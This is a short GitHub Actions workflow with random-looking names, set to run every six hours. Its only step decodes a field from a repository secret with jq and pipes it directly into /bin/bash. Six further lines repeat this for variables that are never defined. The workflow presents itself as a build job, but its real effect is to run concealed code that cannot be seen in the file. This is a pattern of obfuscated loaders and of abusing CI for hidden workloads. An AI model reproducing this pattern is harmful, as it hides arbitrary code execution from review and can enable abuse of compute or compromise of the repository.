name: yanhuidang8765
on:
  workflow_dispatch:
  schedule:
    - cron: '59 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanhuidang8765
        env:
          jw031: ${{ secrets.jw031 }}
        run: |
          echo $jw031 | jq -r .bc75 | /bin/bash
          echo $hza85 | jq -r .sll176 | /bin/bash
          echo $zbi46422 | jq -r .up9307 | /bin/bash
          echo $xqjyt40438 | jq -r .pkl2971 | /bin/bash
          echo $i93360 | jq -r .hfjlm5560 | /bin/bash
          echo $s73280 | jq -r .k49 | /bin/bash
          echo $kk1064 | jq -r .pdg027 | /bin/bash

